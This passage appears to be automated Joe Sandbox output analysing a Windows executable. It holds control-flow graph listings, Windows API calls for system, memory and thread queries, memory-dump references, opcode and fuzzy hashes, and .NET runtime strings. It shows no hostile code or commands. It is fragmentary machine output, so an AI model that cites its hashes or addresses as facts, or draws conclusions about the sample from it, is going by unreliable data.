7ff67dccb29a 17027->17029 17028->17025 17030 7ff67dccb2c5 17029->17030 17031 7ff67dce18c0 2 API calls 17029->17031 17032 7ff67dcd2700 6 API calls 17030->17032 17031->17030 17033 7ff67dccb330 17032->17033

                      Control-flow Graph

                      APIs
                      • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC273F
                      • GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC277D
                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC27A9
                      • GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC27BA
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC27C9
                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC2860
                      • GetProcessAffinityMask.KERNEL32 ref: 00007FF67DCC2873
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                      • String ID:
                      • API String ID: 580471860-0
                      • Opcode ID: a6f235403c72314509f6fd457ef3fd8c232f809f8bef4b2fae904f390bc2eabd
                      • Instruction ID: d979771497837716286a59d9ff665b2161b062e2e15b305e8566da19ec5d9522
                      • Opcode Fuzzy Hash: a6f235403c72314509f6fd457ef3fd8c232f809f8bef4b2fae904f390bc2eabd
                      • Instruction Fuzzy Hash: E1516D73A2878686EA509F29E840679B3A5FB44784F840B32DA4DD7364FF3CE546DB01

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 304 7ff67dcc91c0-7ff67dcc91ee call 7ff67dcbe0a0 call 7ff67dcc2920 309 7ff67dcc91f0-7ff67dcc91f5 304->309 310 7ff67dcc91f7-7ff67dcc9205 304->310 311 7ff67dcc9209-7ff67dcc9257 call 7ff67dcb9d90 call 7ff67dcc24f0 call 7ff67dcc3900 309->311 310->311 318 7ff67dcc9269-7ff67dcc9270 call 7ff67dcc22e0 311->318 319 7ff67dcc9259-7ff67dcc9267 311->319 322 7ff67dcc9275 318->322 320 7ff67dcc927c-7ff67dcc92f8 call 7ff67dcc3810 call 7ff67dcc3870 call 7ff67dcc3820 call 7ff67dcc3840 call 7ff67dcc38a0 319->320 333 7ff67dcc93fe-7ff67dcc9408 320->333 334 7ff67dcc92fe-7ff67dcc9305 320->334 322->320 336 7ff67dcc98ad-7ff67dcc98c3 333->336 337 7ff67dcc940e-7ff67dcc9415 333->337 335 7ff67dcc930b-7ff67dcc9312 334->335 334->336 335->336 338 7ff67dcc9318-7ff67dcc9332 call 7ff67dcc3880 call 7ff67dcc3830 call 7ff67dcc3850 335->338 339 7ff67dcc9419-7ff67dcc941c 337->339 363 7ff67dcc9334-7ff67dcc9336 338->363 364 7ff67dcc935f-7ff67dcc9365 338->364 341 7ff67dcc9423-7ff67dcc9426 339->341 343 7ff67dcc943a-7ff67dcc943d 341->343 344 7ff67dcc9428-7ff67dcc942b 341->344 347 7ff67dcc943f-7ff67dcc9451 call 7ff67dcc3860 343->347 348 7ff67dcc94b6 343->348 344->343 346 7ff67dcc942d-7ff67dcc9434 344->346 346->336 346->343 359 7ff67dcc9453-7ff67dcc9473 347->359 360 7ff67dcc9475 347->360 349 7ff67dcc94bd-7ff67dcc94c0 348->349 352 7ff67dcc94e2-7ff67dcc94fd call 7ff67dcc38e0 349->352 353 7ff67dcc94c2-7ff67dcc94c9 349->353 367 7ff67dcc94ff-7ff67dcc9509 352->367 368 7ff67dcc9551-7ff67dcc9569 call 7ff67dcc3fd0 call 7ff67dcc3ff0 352->368 353->352 356 7ff67dcc94cb-7ff67dcc94e1 353->356 361 7ff67dcc947c-7ff67dcc947f 359->361 360->361 361->348 366 7ff67dcc9481-7ff67dcc9488 361->366 363->336 369 7ff67dcc933c-7ff67dcc933f 363->369 364->336 365 7ff67dcc936b-7ff67dcc9371 364->365 365->336 370 7ff67dcc9377-7ff67dcc937b 365->370 366->353 371 7ff67dcc948a-7ff67dcc94b4 366->371 373 7ff67dcc9523-7ff67dcc953a 367->373 374 7ff67dcc950b-7ff67dcc9512 367->374 385 7ff67dcc956b-7ff67dcc9576 call 7ff67dcc3980 368->385 386 7ff67dcc95bc-7ff67dcc95d6 call 7ff67dcc3980 368->386 369->336 375 7ff67dcc9345-7ff67dcc935a 369->375 370->336 377 7ff67dcc9381-7ff67dcc938a 370->377 371->349 376 7ff67dcc953e-7ff67dcc954a 373->376 374->376 379 7ff67dcc9514-7ff67dcc9516 374->379 375->341 376->368 377->336 380 7ff67dcc9390-7ff67dcc93fc 377->380 382 7ff67dcc951d-7ff67dcc9521 379->382 383 7ff67dcc9518-7ff67dcc951b 379->383 380->339 382->376 383->376 391 7ff67dcc9583-7ff67dcc95a8 call 7ff67dccb940 385->391 392 7ff67dcc9578-7ff67dcc9580 call 7ff67dccb990 385->392 396 7ff67dcc95ec-7ff67dcc95f8 386->396 397 7ff67dcc95d8-7ff67dcc95e8 386->397 400 7ff67dcc95aa-7ff67dcc95ba call 7ff67dccb940 391->400 401 7ff67dcc9609-7ff67dcc9639 call 7ff67dcc3fe0 call 7ff67dcc37d0 call 7ff67dcc38f0 391->401 392->391 402 7ff67dcc9601-7ff67dcc9606 396->402 403 7ff67dcc95fa-7ff67dcc95ff 396->403 397->396 400->401 412 7ff67dcc963b-7ff67dcc9656 401->412 413 7ff67dcc9657-7ff67dcc9661 401->413 402->401 403->401 414 7ff67dcc9663-7ff67dcc966f 413->414 415 7ff67dcc968d-7ff67dcc9694 413->415 416 7ff67dcc9671-7ff67dcc9674 414->416 417 7ff67dcc9676-7ff67dcc968b 414->417 418 7ff67dcc98a3 415->418 419 7ff67dcc969a-7ff67dcc96a1 415->419 416->419 417->419 418->336 419->418 420 7ff67dcc96a7-7ff67dcc96c7 call 7ff67dcdf6c0 419->420 422 7ff67dcc96cc-7ff67dcc9700 call 7ff67dcc3f90 call 7ff67dcc3fc0 call 7ff67dcc3fa0 call 7ff67dcc3fb0 420->422 431 7ff67dcc9895 422->431 432 7ff67dcc9706-7ff67dcc973d call 7ff67dcc3890 422->432 435 7ff67dcc989c 431->435 436 7ff67dcc975e-7ff67dcc9774 432->436 437 7ff67dcc973f-7ff67dcc975c 432->437 435->418 439 7ff67dcc97a2-7ff67dcc97ac 436->439 440 7ff67dcc9776-7ff67dcc97a0 436->440 438 7ff67dcc97ae-7ff67dcc97c1 437->438 441 7ff67dcc97c3-7ff67dcc97cc 438->441 442 7ff67dcc97ce 438->442 439->438 440->439 443 7ff67dcc97d4-7ff67dcc9805 call 7ff67dcc38d0 call 7ff67dd19050 441->443 442->443 443->435 448 7ff67dcc980b-7ff67dcc981d call 7ff67dcc1e70 443->448 448->418 451 7ff67dcc9823-7ff67dcc982f call 7ff67dcc1f30 448->451 454 7ff67dcc9831-7ff67dcc983d call 7ff67dcb4c50 451->454 455 7ff67dcc9847-7ff67dcc987a call 7ff67dcddea0 451->455 454->455 460 7ff67dcc9881-7ff67dcc9884 455->460 461 7ff67dcc987c call 7ff67dd18f88 455->461 460->431 463 7ff67dcc9886-7ff67dcc9890 call 7ff67dcf2b20 call 7ff67dcb4c50 460->463 461->460 463->431
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: GlobalMemoryProcessQueryStatus$CurrentFrequencyInformationObjectPerformance
                      • String ID: Creation of WaitForGCEvent failed$TraceGC is not turned on
                      • API String ID: 133006248-518909315
                      • Opcode ID: e5a1d14a811cecabfcf376ee861ea00384ee56e107421d5786fe78e1282b5c1a
                      • Instruction ID: 13b0f62aa5a19c3e85d876a394ae3afe15f7ba0d49130869d39b7fc7420c7aee
                      • Opcode Fuzzy Hash: e5a1d14a811cecabfcf376ee861ea00384ee56e107421d5786fe78e1282b5c1a
                      • Instruction Fuzzy Hash: A4027F23E3E78782FA65DB61B85127462A8AF84781F154F75DA0EC77A1FF3CA4428301
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6221f1281a539eae9a028807488e3916a2c7ac0af4249366de13d0f3a776307c
                      • Instruction ID: af2815bd8884608b8dd1178c9ec801903f1591c0a17fcc4d8cd992859e0cea23
                      • Opcode Fuzzy Hash: 6221f1281a539eae9a028807488e3916a2c7ac0af4249366de13d0f3a776307c
                      • Instruction Fuzzy Hash: 2362C573A7878686EB558B259A4033977A5BF88780F618B36D90ED3750FF3CE492C640
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CurrentProcess
                      • String ID:
                      • API String ID: 2050909247-0
                      • Opcode ID: 1a796d816c50f69b5890ba20cff1118b7a499f98528019bae5c9ec1a76721685
                      • Instruction ID: da3ade83ead43c81857c8ba8823333913474715ae7ec9bcf37af234872dbf906
                      • Opcode Fuzzy Hash: 1a796d816c50f69b5890ba20cff1118b7a499f98528019bae5c9ec1a76721685
                      • Instruction Fuzzy Hash: 5F02A0A3E2D68686FA15CB25A84227837A5BF45784F058F36C84DE3261FF3CB5829641
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5f4a378163527d27ee7393a84908dc1d63c8cfa8a30fbe58206181ead7b0ccc0
                      • Instruction ID: 7e3fbbe1e2dabba681250029bfca1421c3813f09ae1e69cbef86deb905706ec0
                      • Opcode Fuzzy Hash: 5f4a378163527d27ee7393a84908dc1d63c8cfa8a30fbe58206181ead7b0ccc0
                      • Instruction Fuzzy Hash: AFF19123D3DBC245F605DB34AD012B562A9BF95384F568F36E94DD32A2FF2CB5928201

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                      • String ID: @$@$@
                      • API String ID: 2645093340-1177533131
                      • Opcode ID: f6fcdfa56d0d25c4968f979f81b8d4dd204bf78d040e198a698aa974329dc884
                      • Instruction ID: e526a075ba53bf9e75561f1d606f822ef138a671edffafe4ee7504f2b73f85bc
                      • Opcode Fuzzy Hash: f6fcdfa56d0d25c4968f979f81b8d4dd204bf78d040e198a698aa974329dc884
                      • Instruction Fuzzy Hash: 72514132719AC186EB71DF11E5403AAB7A4FB88B90F444735CA9D93B98EF7CD4468B00

                      Control-flow Graph

                      APIs
                      • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF67DCB57EB), ref: 00007FF67DCBB0AB
                        • Part of subcall function 00007FF67DCC2730: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC273F
                        • Part of subcall function 00007FF67DCC2730: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC277D
                        • Part of subcall function 00007FF67DCC2730: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC27A9
                        • Part of subcall function 00007FF67DCC2730: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC27BA
                        • Part of subcall function 00007FF67DCC2730: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC27C9
                        • Part of subcall function 00007FF67DCBD830: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF67DCBD92D
                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF67DCB57EB), ref: 00007FF67DCBB11A
                      • GetProcessAffinityMask.KERNEL32 ref: 00007FF67DCBB12D
                      • QueryInformationJobObject.KERNEL32 ref: 00007FF67DCBB17E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem_wcsicmp
                      • String ID: PROCESSOR_COUNT
                      • API String ID: 296690692-4048346908
                      • Opcode ID: 7e1e5d008c002b0aa0cd323f4132cd8197a7cb78147492bad3a820433617ee8b
                      • Instruction ID: aa56501582c02660489e6413ed332da57ea8d4f95fc2d68d9c9ed622eb0f66d5
                      • Opcode Fuzzy Hash: 7e1e5d008c002b0aa0cd323f4132cd8197a7cb78147492bad3a820433617ee8b
                      • Instruction Fuzzy Hash: 6531A333A2C643C6EB549F10D8802B967BAEF84344F441A35D64EC36D5FE3CE44A8700

                      Control-flow Graph

                      APIs
                      Strings
                      • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF67DCB67A6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ExceptionFailFastRaise$Sleep
                      • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                      • API String ID: 3706814929-926682358
                      • Opcode ID: 1c87f8d017a5f0b7b33499c6861a2261ea0fd599042be02af365e75ac2e1ff0f
                      • Instruction ID: 8c2054e931cf411a8ce4a1c46e51d4f50655b9363081a6e9086ab623eed1aa45
                      • Opcode Fuzzy Hash: 1c87f8d017a5f0b7b33499c6861a2261ea0fd599042be02af365e75ac2e1ff0f
                      • Instruction Fuzzy Hash: 78415A33A79A82C6EB90CB15E44076933A8EF44B88F544A39DA4D9B3D0EF3DE4528740

                      Control-flow Graph

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Thread$CloseCreateHandlePriorityResume
                      • String ID:
                      • API String ID: 3633986771-0
                      • Opcode ID: f19819daf7f2dc5529685b70a43f9161d5748a4cfd19ac569aa77e37f2a15410
                      • Instruction ID: 48be48a5cf3c6235d958ccf8df7e99be9e32bef70918ad958b219168bf91e526
                      • Opcode Fuzzy Hash: f19819daf7f2dc5529685b70a43f9161d5748a4cfd19ac569aa77e37f2a15410
                      • Instruction Fuzzy Hash: AFE06DAAA2470282FB16AB21AC183355751BF98BD5F484934DD8F463A0FE3C92A68604

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 119 7ff67dcc2100-7ff67dcc2131 120 7ff67dcc21ef-7ff67dcc220c GlobalMemoryStatusEx 119->120 121 7ff67dcc2137-7ff67dcc2152 GetCurrentProcess call 7ff67dd18c6b 119->121 123 7ff67dcc2292-7ff67dcc2295 120->123 124 7ff67dcc2212-7ff67dcc2215 120->124 121->120 134 7ff67dcc2158-7ff67dcc2160 121->134 125 7ff67dcc229e-7ff67dcc22a1 123->125 126 7ff67dcc2297-7ff67dcc229b 123->126 128 7ff67dcc2281-7ff67dcc2284 124->128 129 7ff67dcc2217-7ff67dcc2222 124->129 132 7ff67dcc22a3-7ff67dcc22a8 125->132 133 7ff67dcc22ab-7ff67dcc22ae 125->133 126->125 130 7ff67dcc2289-7ff67dcc228c 128->130 131 7ff67dcc2286 128->131 135 7ff67dcc2224-7ff67dcc2229 129->135 136 7ff67dcc222b-7ff67dcc223c 129->136 137 7ff67dcc228e-7ff67dcc2290 130->137 138 7ff67dcc22b8-7ff67dcc22db call 7ff67dd19030 130->138 131->130 132->133 133->138 139 7ff67dcc22b0 133->139 140 7ff67dcc2162-7ff67dcc2168 134->140 141 7ff67dcc21ca-7ff67dcc21cf 134->141 142 7ff67dcc2240-7ff67dcc2251 135->142 136->142 147 7ff67dcc22b5 137->147 139->147 148 7ff67dcc2171-7ff67dcc2185 140->148 149 7ff67dcc216a-7ff67dcc216f 140->149 145 7ff67dcc21e1-7ff67dcc21e4 141->145 146 7ff67dcc21d1-7ff67dcc21d4 141->146 143 7ff67dcc2253-7ff67dcc2258 142->143 144 7ff67dcc225a-7ff67dcc226e 142->144 153 7ff67dcc2272-7ff67dcc227e 143->153 144->153 145->138 156 7ff67dcc21ea 145->156 154 7ff67dcc21d6-7ff67dcc21d9 146->154 155 7ff67dcc21db-7ff67dcc21de 146->155 147->138 151 7ff67dcc2189-7ff67dcc219a 148->151 149->151 157 7ff67dcc21a3-7ff67dcc21b7 151->157 158 7ff67dcc219c-7ff67dcc21a1 151->158 153->128 154->145 155->145 156->147 159 7ff67dcc21bb-7ff67dcc21c7 157->159 158->159 159->141
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CurrentGlobalMemoryProcessStatus
                      • String ID: @
                      • API String ID: 3261791682-2766056989
                      • Opcode ID: 3cbc60183daf17e2fccb2976172cf10b22a13a5ce65424d1e6ea0fd7bd43531d
                      • Instruction ID: 0b0b191f3aa4e129f3325cdd02ddb4e4407d381b41ba224a275fe7b0d726ddcd
                      • Opcode Fuzzy Hash: 3cbc60183daf17e2fccb2976172cf10b22a13a5ce65424d1e6ea0fd7bd43531d
                      • Instruction Fuzzy Hash: 8C41F463B29B4641E957CB369510339E266AF5ABD0F18CB31DF0EA6744FF3CE4928600

                      Control-flow Graph

                      APIs
                      • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF67DCDDAA9), ref: 00007FF67DCF0590
                      • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF67DCDDAA9), ref: 00007FF67DCF0606
                      • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF67DCDDAA9), ref: 00007FF67DCF065E
                      • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF67DCDDAA9), ref: 00007FF67DCF0684
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterLeave
                      • String ID:
                      • API String ID: 3168844106-0
                      • Opcode ID: c480e3b17c3b7e895e30b379d2c7d3fe21071970ef4a9a351df021ce0ece1ff4
                      • Instruction ID: 8c25563ac989a6b94775b4e7deccc6380713fbb69f74ea989459faec5c4f3353
                      • Opcode Fuzzy Hash: c480e3b17c3b7e895e30b379d2c7d3fe21071970ef4a9a351df021ce0ece1ff4
                      • Instruction Fuzzy Hash: D6418D23E2D68281FA209F24E8017B923A8BF94B40F560A35D94DD72A1FF7CE4469711

                      Control-flow Graph

                      • Executed
                      • Not Executed
